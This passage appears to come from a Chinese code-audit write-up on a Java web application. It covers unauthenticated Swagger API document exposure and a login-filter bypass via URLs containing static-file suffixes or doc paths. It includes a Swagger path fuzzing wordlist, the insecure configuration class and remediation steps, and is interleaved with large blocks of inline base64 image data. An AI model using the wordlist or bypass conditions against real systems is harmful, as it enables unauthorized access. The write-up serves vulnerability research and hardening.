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
<p><a id=img24 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233517-801a467e-c117-1.png><img src=data:image/png;base64,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
<p>还存在很多,不一一列举</p>
<h2 id=toc-15>信息泄露</h2>
<h3 id=toc-16>swagger-api文档信息泄露</h3>
<h4>关键点</h4>
<p>Swagger是一个规范和完整的框架用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。</p>
<p>spring项目中的配置参考<a href=https://developer.aliyun.com/article/1361365 target=_blank>解决 Swagger API 未授权访问漏洞:完善分析与解决方案-阿里云开发者社区 (aliyun.com)</a></p>
<p>相关路径在实际测试工程中可用以下字典fuzz</p>
<div class=highlight><pre><span></span>/api
/api-docs
/api-docs/swagger.json
/api.html
/api/api-docs
/api/apidocs
/api/doc
/api/swagger
/api/swagger-ui
/api/swagger-ui.html
/api/swagger-ui.html/
/api/swagger-ui.json
/api/swagger.json
/api/swagger/
/api/swagger/ui
/api/swagger/ui/
/api/swaggerui
/api/swaggerui/
/api/v1/
/api/v1/api-docs
/api/v1/apidocs
/api/v1/swagger
/api/v1/swagger-ui
/api/v1/swagger-ui.html
/api/v1/swagger-ui.json
/api/v1/swagger.json
/api/v1/swagger/
/api/v2
/api/v2/api-docs
/api/v2/apidocs
/api/v2/swagger
/api/v2/swagger-ui
/api/v2/swagger-ui.html
/api/v2/swagger-ui.json
/api/v2/swagger.json
/api/v2/swagger/
/api/v3
/apidocs
/apidocs/swagger.json
/doc.html
/docs/
/druid/index.html
/graphql
/libs/swaggerui
/libs/swaggerui/
/spring-security-oauth-resource/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/sw/swagger-ui.html
/swagger
/swagger-resources
/swagger-resources/configuration/security
/swagger-resources/configuration/security/
/swagger-resources/configuration/ui
/swagger-resources/configuration/ui/
/swagger-ui
/swagger-ui.html
/swagger-ui.html#/api-memory-controller
/swagger-ui.html/
/swagger-ui.json
/swagger-ui/swagger.json
/swagger.json
/swagger.yml
/swagger/
/swagger/index.html
/swagger/static/index.html
/swagger/swagger-ui.html
/swagger/ui/
/Swagger/ui/index
/swagger/ui/index
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/template/swagger-ui.html
/user/swagger-ui.html
/user/swagger-ui.html/
/v1.x/swagger-ui.html
/v1/api-docs
/v1/swagger.json
/v2/api-docs
/v3/api-docs
</pre></div>
<h4>分析</h4>
<p>swagger配置类Swagger2Config.java</p>
<div class=highlight><pre><span></span><span class=nd>@Configuration</span>
<span class=nd>@EnableSwagger2</span>
<span class=kd>public</span> <span class=kd>class</span> <span class=nc>Swagger2Config</span> <span class=o>{</span>
<span class=nd>@Bean</span>
<span class=kd>public</span> <span class=n>Docket</span> <span class=nf>createRestApi</span><span class=o>()</span> <span class=o>{</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>Docket</span><span class=o>(</span><span class=n>DocumentationType</span><span class=o>.</span><span class=na>SWAGGER_2</span><span class=o>)</span>
<span class=o>.</span><span class=na>apiInfo</span><span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>apiInfo</span><span class=o>())</span>
<span class=o>.</span><span class=na>select</span><span class=o>()</span>
<span class=o>.</span><span class=na>apis</span><span class=o>(</span><span class=n>RequestHandlerSelectors</span><span class=o>.</span><span class=na>any</span><span class=o>())</span>
<span class=o>.</span><span class=na>paths</span><span class=o>(</span><span class=n>PathSelectors</span><span class=o>.</span><span class=na>any</span><span class=o>())</span>
<span class=o>.</span><span class=na>build</span><span class=o>();</span>
<span class=o>}</span>
<span class=kd>private</span> <span class=n>ApiInfo</span> <span class=nf>apiInfo</span><span class=o>()</span> <span class=o>{</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>ApiInfoBuilder</span><span class=o>()</span>
<span class=o>.</span><span class=na>title</span><span class=o>(</span><span class=s>"Mybatis-Plus Plugin Example RESTful APIs"</span><span class=o>)</span>
<span class=o>.</span><span class=na>description</span><span class=o>(</span><span class=s>"集成Mybatis-Plus模块接口描述"</span><span class=o>)</span>
<span class=o>.</span><span class=na>termsOfServiceUrl</span><span class=o>(</span><span class=s>"http://127.0.0.1"</span><span class=o>)</span>
<span class=o>.</span><span class=na>contact</span><span class=o>(</span><span class=k>new</span> <span class=n>Contact</span><span class=o>(</span><span class=s>"jishenghua"</span><span class=o>,</span> <span class=s>""</span><span class=o>,</span> <span class=s>""</span><span class=o>))</span>
<span class=o>.</span><span class=na>version</span><span class=o>(</span><span class=s>"2.1.1"</span><span class=o>)</span>
<span class=o>.</span><span class=na>build</span><span class=o>();</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>在该类及配置文件中未进行任何的限制及访问控制和身份验证另外在filter中也未进行身份判断因此导致在未登录的情况下能够请求得到api接口</p>
<h4>测试</h4>
<p><a id=img25 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233536-8baf5894-c117-1.png><img src="data:image/png;base64,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
<h4>修复</h4>
<ol>
<li>限制生成文档的请求处理程序:使用适当的 <code>RequestHandlerSelectors</code> 来选择只包含需要公开的接口,而不是使用 <code>RequestHandlerSelectors.any()</code></li>
<li>限制生成文档的路径:使用适当的 <code>PathSelectors</code> 来选择只包含需要公开的路径,而不是使用 <code>PathSelectors.any()</code></li>
<li>添加访问控制和身份验证:确保只有授权用户能够访问 Swagger API 文档。这可以通过配置身份验证和授权机制来实现,例如基于角色或令牌的访问控制。</li>
<li>定期审查和更新配置:定期审查 Swagger API 文档的配置,确保其与应用程序的安全需求保持一致,并经常更新以反映最新的安全要求。</li>
</ol>
<h3 id=toc-17>账号密码泄露</h3>
<h4>分析</h4>
<p>在LogCostFilter.java中进行了简单分析有3个条件只需要满足其中一个即可不需要登录就能够访问</p>
<ul>
<li>请求url中包含/doc.html、/register.html、/login.html</li>
<li>请求url中包含[.css.js.jpg.png.gif.ico]中任意一个元素即可</li>
<li>请求url以/user/login、/user/registerUser、/v2/api-docs开头即可</li>
</ul>
<p>因此选择上面的任意一个条件利用即可</p>
<h4>测试</h4>
<p><a id=img26 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233549-9358666c-c117-1.png><img src="data:image/png;base64,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